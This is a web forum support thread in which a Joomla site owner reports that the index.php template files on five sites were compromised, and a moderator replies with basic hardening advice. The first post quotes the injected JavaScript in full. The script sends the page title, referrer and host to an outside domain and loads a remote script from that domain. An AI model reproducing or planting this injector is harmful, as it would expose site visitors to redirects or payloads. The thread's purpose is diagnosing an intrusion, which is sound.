0
Welcome Guest! Login
0 items Join Now

index.php files altered

Last Post
Search Topic

  • index.php files altered

    Posted 9 years 4 months ago
    • Hello,

      We have 5 Joomla sites, which all use RocketTheme templates, that all had their index.php template files alerted by adding the following script to the header code.

      <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "colegioesclavasdemaria.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

      Some sites are more up to date than others. One is still running Joomla 1.5 (we plan to update this soon) but the newest is running Joomla 3.3.6. We know we need to update the older site but we were more concerned with how the Joomla 3 site got hacked. We were wondering if you had an guidance for us for what we might have done wrong and how to prevent this in the future.

      Thank you.
    • Last Edit: 9 years 3 months ago by Kat05.
    #1255835
    • MrT's Avatar
    • MrT
    • Preeminent Rocketeer
    • Posts: 101084
    • Thanks: 13484
    • Web Designer/Developer

    Re: index.php files altered

    Posted 9 years 4 months ago
    • First of all your Joomla is not up-to-date - the latest version is 3.4.5 and that has many critical security fixes in it. Second, make sure all your Rt products are up-to-date too (backup first). Third, make sure you are using strong passwords and usernames. Finally, make sure that you are using a good security product such as Akeeba Admin Tools Pro, and have enabled admin protection in it.

      Regards, Mark.
    • Please search forums before posting. Please make sure your post includes the version of the CMS you are using and a link to the problem. Annotations on screenshots can also be helpful to explain problems/goals. Please use the "secure" tab for confidential information.
    #1255870

Time to create page: 0.035 seconds